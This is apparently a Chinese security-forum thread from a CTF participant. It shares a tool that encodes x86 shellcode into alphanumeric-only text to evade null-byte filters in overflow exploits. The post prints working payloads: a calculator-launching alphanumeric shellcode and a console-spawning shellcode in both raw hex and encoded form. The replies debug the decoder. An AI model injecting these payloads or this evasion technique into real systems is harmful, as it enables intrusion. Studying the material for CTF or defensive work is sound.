[原创]ShellCodeToAscii-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com

[原创]ShellCodeToAscii

发表于: 2012-10-7 15:32 15154

[原创]ShellCodeToAscii

半斤八兩

2012-10-7 15:32

15154

/*
最近在玩西安电子大学的网络攻防比赛,里面的溢出赛题蛮有意思的,之前没有接触过.
其中最后一题的FTP溢出题,我写的EXP在我电脑上运行是正常的.可是在朋友的电脑上却失败.
最终原因,就是因为ShellCode的部分数据的影响.
最后看到别人有全字符的ShellCode,看起来很酷.(在网上搜了一下,看来源好像是Zwell写的ShellCode.)
后来拿来研究了一下.

其代码是分两段解释器.
都是将字母ShellCode转换成真正的ShellCode.
以此来绕过截0和其它等限制.

此代码的解释器用的是老外的.我只是改成MFC了.方便大家 :)

ShellCode From:
EAX
ECX
EDX
EBX
ESP
EBP
ESI
EDI
NOP
[ESP-0x10]
[ESP-0xC]
[ESP-0x8]
[ESP-0x4]
[ESP]
[ESP+0X4]
[ESP+0X8]
[ESP+0XC]
[ESP+0X10]
[ESP+0X14]
[ESP+0X18]
[ESP+0X1C]
[SEH]

Zwell's ShellCode:
char szShellCode[]=
"PZhSSUSX5SSUSH4C0B6RYkA7XA3A7A2B70B7BhTWUQX5TWUQ4c8A7ubi3PI7kQ1W"
"6W1EV9A84xdeLg3kIUKl3J6DuWNA8wk0kstyzbDKryeyza82vAMdMgMFjKVyBlEC"
"6aLM1PkaQxMXmC72VL4Oei1YUf1xmfqhh8d2V6ibZ7yCnxTUyelUTCeJ7YOM5HTu"
"ECIwjOLAkppdMagoJMl5ur69UdyEUysaAR9tG4ksEgaGEIy95zlsrRt2rt6twkhg"
"JNNBViHbsVE76oDEuUmwBpkanAQU30kavJmiUiqpMQMANIxonAMi5XHibCBnGNFJ"
"VJ3gGZhZ545BmdPGFoCuFb2mMiegVwvPLaCSyKWtAInpGu4jUxUwNa8c";

// 这个shellcode好像是打开计算器

本程序转换前的CmdShell:
"FC33D2B23064FF325A8B520C8B52148B722833C9B11833FF33C0AC3C617C022C20C1CF0D03F8E2F081FF5BBC4A6A8B5A108B1275DA8B533C03D3FF72348B527803D38B722003F333C941AD03C381384765745075F4817804726F634175EB8178086464726575E2498B722403F3668B0C4E8B721C03F38B148E03D3526878656301FE4C24036857696E455453FFD268636D6401FE4C24036A0533C98D4C240451FFD068657373018BDFFE4C24036850726F63684578697454FF742420FF54242057FFD0";

// 本程序这个打开的是控制台

本程序转换后的CmdShell:
"PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylTsxROBP0Pdyo6RqJLKV2dLLKsbDTLKCBThDsHIMaTXTskOgCKpLlulu1sLs2FLepiQJoTMVcjXM2L0OqKOCkMlQZqznkBzDPLKDRD5yJLK0SGLuSZsKOqbvTlK3bPxdCxSNkT210uSZSP3O971nM5So3MQTxBgSUptPPRUL4oqqhuTRRPoqsw145JKmQD8c8u4pd420eBU9rSynkT2et7szSQvNkvlPNnkbRWl4CKCNkb4lNESkcRru8QhquSSEQ9nRlEtgsrHpWsYrNpECdpSyoZrU8e3pmE4UQKNRlutfcQz5UVSO9LMpLtdGtSayoJpRHu5Ps2SuQLKyOKNRlwTC3U82prRpo53bHSuPxbIBTV4KOptetWPkOsdQ4GPaGkOWp"

*/

简单程序,大牛路过~
ShellCodeToAscii.rar

登录后可查看完整内容

[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)

上传的附件：

ShellCodeToAscii.rar （22.02kb，571次下载）
ShellCodeToAscii.png （23.42kb，678次下载）

收藏・38

免费・6

支持

最新回复 (19)
Vsbat 雪币： 859 活跃值： (309) 能力值： ( LV11，RANK：180 ) 在线值：发帖 9 回帖 273 粉丝 4 关注私信	Vsbat 4 2 楼 alpha3... http://code.google.com/p/alpha3/ PS: cm6 Post出来没？ 2012-10-7 15:34 0
uing 雪币： 85 活跃值： (87) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 160 粉丝 0 关注私信	uing 3 楼 CM6胖爷给秒了; 顺便前排膜拜八爷... 2012-10-7 15:40 0
半斤八兩雪币： 223 活跃值： (516) 能力值： ( LV13，RANK：520 ) 在线值：发帖 68 回帖 610 粉丝 22 关注私信	半斤八兩 10 4 楼算法我不会,没有弄出来哈. 2012-10-7 15:52 0
Vsbat 雪币： 859 活跃值： (309) 能力值： ( LV11，RANK：180 ) 在线值：发帖 9 回帖 273 粉丝 4 关注私信	Vsbat 4 5 楼我也蔫了。。尼玛第一个就开始做这个题。。结果信心打击到爆。。0分 ⊙﹏⊙b汗我只看到了4次base64一次MD5。。（嘘。。不算违规吧）那我也整不出来了 2012-10-7 15:59 0
半斤八兩雪币： 223 活跃值： (516) 能力值： ( LV13，RANK：520 ) 在线值：发帖 68 回帖 610 粉丝 22 关注私信	半斤八兩 10 6 楼其实我按我的方法也能整出来的. 只是那样出来的KEY就不一样了.大概71+2 73的长度. 他出的题有BUG的. 2012-10-7 16:11 0
uing 雪币： 85 活跃值： (87) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 160 粉丝 0 关注私信	uing 7 楼其实还有个AES; AES(MD5(A), MD5(B)) == A2096DD3FE74B4EC 2012-10-7 16:35 0
Vsbat 雪币： 859 活跃值： (309) 能力值： ( LV11，RANK：180 ) 在线值：发帖 9 回帖 273 粉丝 4 关注私信	Vsbat 4 8 楼你想exploit嘛。。。好吧 2012-10-7 16:54 0
Vsbat 雪币： 859 活跃值： (309) 能力值： ( LV11，RANK：180 ) 在线值：发帖 9 回帖 273 粉丝 4 关注私信	Vsbat 4 9 楼我去 AES。。。。好吧 2012-10-7 16:55 0
喵了个咪雪币： 45 活跃值： (25) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 33 粉丝 0 关注私信	喵了个咪 10 楼 AES？……小弟以为那是DES，囧了占楼看各位大神讨论 2012-10-7 20:56 0
HOWMP 雪币： 2835 活跃值： (2643) 能力值： ( LV6，RANK：80 ) 在线值：发帖 8 回帖 248 粉丝 7 关注私信	HOWMP 1 11 楼转换后应该以A字符结束，不然解码的时候会越界 patch后的 ShellCodeToAscii.zip 还有个问题就是最后一个字节老是解密错误，不得不在原shellcode后添加一个NOP才能正常运行上传的附件： ShellCodeToAscii.zip （7.05kb，166次下载） 2012-10-7 20:57 0
半斤八兩雪币： 223 活跃值： (516) 能力值： ( LV13，RANK：520 ) 在线值：发帖 68 回帖 610 粉丝 22 关注私信	半斤八兩 10 12 楼 [QUOTE=HOWMP;1107105]转换后应该以A字符结束，不然解码的时候会越界 patch后的 ShellCodeToAscii.zip 还有个问题就是最后一个字节老是解密错误，不得不在原shellcode后添加一个NOP才能正常运行[/QUOTE] 厉害啊. 这个写的不好的,我没有修改算法. 这个解密有靠概率问题的. 解密到尾部时,不会停止. 会继续解密,只到堆栈中,有出现 0x41, 才会停止解密. 我看过Zwell 大牛的ShellCode写的非常的好. 分两次解密引擎. 没有时间改啦,等有时间我再改吧. 我之所以写这个,是因为溢出题,第四题在虚拟机下有问题, 一开始我以为是字符的原因.刚刚调试分析了半天, 发现,原来是我向FTP SERVER send user and pass 以及 LIST packet 的时候,中间没有sleep 所以溢出失败. 惨痛教训啊. 这也证明了vm ware 理论速度确实比物理机的理论速度要快. 2012-10-7 21:40 0
半斤八兩雪币： 223 活跃值： (516) 能力值： ( LV13，RANK：520 ) 在线值：发帖 68 回帖 610 粉丝 22 关注私信	半斤八兩 10 13 楼 [QUOTE=HOWMP;1107105]转换后应该以A字符结束，不然解码的时候会越界 patch后的 ShellCodeToAscii.zip 还有个问题就是最后一个字节老是解密错误，不得不在原shellcode后添加一个NOP才能正常运行[/QUOTE] 最后一字节出错,是因为你PATCH了加密后的数据. 等有时间了,我再重写一个解密引擎吧. 2012-10-7 21:42 0
snowdbg 雪币： 3171 活跃值： (76) 能力值： (RANK：250 ) 在线值：发帖 13 回帖 129 粉丝 2 关注私信	snowdbg 6 14 楼写得不错, 但是对于新手来讲,还需要多研究原理,傻瓜化的工具会让人懒惰 2012-10-8 08:15 0
wqxxrn 雪币： 204 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 12 回帖 34 粉丝 0 关注私信	wqxxrn 15 楼傻瓜化的工具会让人懒惰，但也能从此慢慢入门。知道原理的，大部份还是会自己写来提取的。很少直接网上下载 2012-10-8 10:21 0
zgyknight 雪币： 2 活跃值： (199) 能力值： ( LV2，RANK：10 ) 在线值：发帖 31 回帖 194 粉丝 0 关注私信	zgyknight 16 楼楼主的背影很好看 2012-10-9 16:31 0
无常pl 雪币： 122 活跃值： (75) 能力值： ( LV7，RANK：100 ) 在线值：发帖 4 回帖 28 粉丝 1 关注私信	无常pl 2 17 楼就是DES吧，我用DES逆算出来的数据对啊 2012-10-15 18:37 0
暖洋洋雪币： 10888 活跃值： (3924) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 97 粉丝 1 关注私信	暖洋洋 18 楼膜拜大神，学习一下了 2015-6-14 11:52 0
DCO 雪币： 7378 活跃值： (1881) 能力值： ( LV10，RANK：174 ) 在线值：发帖 2 回帖 11 粉丝 0 关注私信	DCO 1 19 楼发现一个bug，当cal esp 或 cal [esp+xx]会错 2019-10-19 13:41 0
半斤八兩雪币： 223 活跃值： (516) 能力值： ( LV13，RANK：520 ) 在线值：发帖 68 回帖 610 粉丝 22 关注私信	半斤八兩 10 20 楼 DCO 发现一个bug，当cal esp 或 cal [esp+xx]会错好细心我记得好像还有一个bug 好像是结束要有'Z'字符太久了不知道是不是记错了 2020-2-15 04:18 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

半斤八兩

发帖

610

回帖

520

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (19)
Vsbat 雪币： 859 活跃值： (309) 能力值： ( LV11，RANK：180 ) 在线值：发帖 9 回帖 273 粉丝 4 关注私信	Vsbat 4 2 楼 alpha3... http://code.google.com/p/alpha3/ PS: cm6 Post出来没？ 2012-10-7 15:34 0
uing 雪币： 85 活跃值： (87) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 160 粉丝 0 关注私信	uing 3 楼 CM6胖爷给秒了; 顺便前排膜拜八爷... 2012-10-7 15:40 0
半斤八兩雪币： 223 活跃值： (516) 能力值： ( LV13，RANK：520 ) 在线值：发帖 68 回帖 610 粉丝 22 关注私信	半斤八兩 10 4 楼算法我不会,没有弄出来哈. 2012-10-7 15:52 0
Vsbat 雪币： 859 活跃值： (309) 能力值： ( LV11，RANK：180 ) 在线值：发帖 9 回帖 273 粉丝 4 关注私信	Vsbat 4 5 楼我也蔫了。。尼玛第一个就开始做这个题。。结果信心打击到爆。。0分 ⊙﹏⊙b汗我只看到了4次base64一次MD5。。（嘘。。不算违规吧）那我也整不出来了 2012-10-7 15:59 0
半斤八兩雪币： 223 活跃值： (516) 能力值： ( LV13，RANK：520 ) 在线值：发帖 68 回帖 610 粉丝 22 关注私信	半斤八兩 10 6 楼其实我按我的方法也能整出来的. 只是那样出来的KEY就不一样了.大概71+2 73的长度. 他出的题有BUG的. 2012-10-7 16:11 0
uing 雪币： 85 活跃值： (87) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 160 粉丝 0 关注私信	uing 7 楼其实还有个AES; AES(MD5(A), MD5(B)) == A2096DD3FE74B4EC 2012-10-7 16:35 0
Vsbat 雪币： 859 活跃值： (309) 能力值： ( LV11，RANK：180 ) 在线值：发帖 9 回帖 273 粉丝 4 关注私信	Vsbat 4 8 楼你想exploit嘛。。。好吧 2012-10-7 16:54 0
Vsbat 雪币： 859 活跃值： (309) 能力值： ( LV11，RANK：180 ) 在线值：发帖 9 回帖 273 粉丝 4 关注私信	Vsbat 4 9 楼我去 AES。。。。好吧 2012-10-7 16:55 0
喵了个咪雪币： 45 活跃值： (25) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 33 粉丝 0 关注私信	喵了个咪 10 楼 AES？……小弟以为那是DES，囧了占楼看各位大神讨论 2012-10-7 20:56 0
HOWMP 雪币： 2835 活跃值： (2643) 能力值： ( LV6，RANK：80 ) 在线值：发帖 8 回帖 248 粉丝 7 关注私信	HOWMP 1 11 楼转换后应该以A字符结束，不然解码的时候会越界 patch后的 ShellCodeToAscii.zip 还有个问题就是最后一个字节老是解密错误，不得不在原shellcode后添加一个NOP才能正常运行上传的附件： ShellCodeToAscii.zip （7.05kb，166次下载） 2012-10-7 20:57 0
半斤八兩雪币： 223 活跃值： (516) 能力值： ( LV13，RANK：520 ) 在线值：发帖 68 回帖 610 粉丝 22 关注私信	半斤八兩 10 12 楼 [QUOTE=HOWMP;1107105]转换后应该以A字符结束，不然解码的时候会越界 patch后的 ShellCodeToAscii.zip 还有个问题就是最后一个字节老是解密错误，不得不在原shellcode后添加一个NOP才能正常运行[/QUOTE] 厉害啊. 这个写的不好的,我没有修改算法. 这个解密有靠概率问题的. 解密到尾部时,不会停止. 会继续解密,只到堆栈中,有出现 0x41, 才会停止解密. 我看过Zwell 大牛的ShellCode写的非常的好. 分两次解密引擎. 没有时间改啦,等有时间我再改吧. 我之所以写这个,是因为溢出题,第四题在虚拟机下有问题, 一开始我以为是字符的原因.刚刚调试分析了半天, 发现,原来是我向FTP SERVER send user and pass 以及 LIST packet 的时候,中间没有sleep 所以溢出失败. 惨痛教训啊. 这也证明了vm ware 理论速度确实比物理机的理论速度要快. 2012-10-7 21:40 0
半斤八兩雪币： 223 活跃值： (516) 能力值： ( LV13，RANK：520 ) 在线值：发帖 68 回帖 610 粉丝 22 关注私信	半斤八兩 10 13 楼 [QUOTE=HOWMP;1107105]转换后应该以A字符结束，不然解码的时候会越界 patch后的 ShellCodeToAscii.zip 还有个问题就是最后一个字节老是解密错误，不得不在原shellcode后添加一个NOP才能正常运行[/QUOTE] 最后一字节出错,是因为你PATCH了加密后的数据. 等有时间了,我再重写一个解密引擎吧. 2012-10-7 21:42 0
snowdbg 雪币： 3171 活跃值： (76) 能力值： (RANK：250 ) 在线值：发帖 13 回帖 129 粉丝 2 关注私信	snowdbg 6 14 楼写得不错, 但是对于新手来讲,还需要多研究原理,傻瓜化的工具会让人懒惰 2012-10-8 08:15 0
wqxxrn 雪币： 204 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 12 回帖 34 粉丝 0 关注私信	wqxxrn 15 楼傻瓜化的工具会让人懒惰，但也能从此慢慢入门。知道原理的，大部份还是会自己写来提取的。很少直接网上下载 2012-10-8 10:21 0
zgyknight 雪币： 2 活跃值： (199) 能力值： ( LV2，RANK：10 ) 在线值：发帖 31 回帖 194 粉丝 0 关注私信	zgyknight 16 楼楼主的背影很好看 2012-10-9 16:31 0
无常pl 雪币： 122 活跃值： (75) 能力值： ( LV7，RANK：100 ) 在线值：发帖 4 回帖 28 粉丝 1 关注私信	无常pl 2 17 楼就是DES吧，我用DES逆算出来的数据对啊 2012-10-15 18:37 0
暖洋洋雪币： 10888 活跃值： (3924) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 97 粉丝 1 关注私信	暖洋洋 18 楼膜拜大神，学习一下了 2015-6-14 11:52 0
DCO 雪币： 7378 活跃值： (1881) 能力值： ( LV10，RANK：174 ) 在线值：发帖 2 回帖 11 粉丝 0 关注私信	DCO 1 19 楼发现一个bug，当cal esp 或 cal [esp+xx]会错 2019-10-19 13:41 0
半斤八兩雪币： 223 活跃值： (516) 能力值： ( LV13，RANK：520 ) 在线值：发帖 68 回帖 610 粉丝 22 关注私信	半斤八兩 10 20 楼 DCO 发现一个bug，当cal esp 或 cal [esp+xx]会错好细心我记得好像还有一个bug 好像是结束要有'Z'字符太久了不知道是不是记错了 2020-2-15 04:18 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复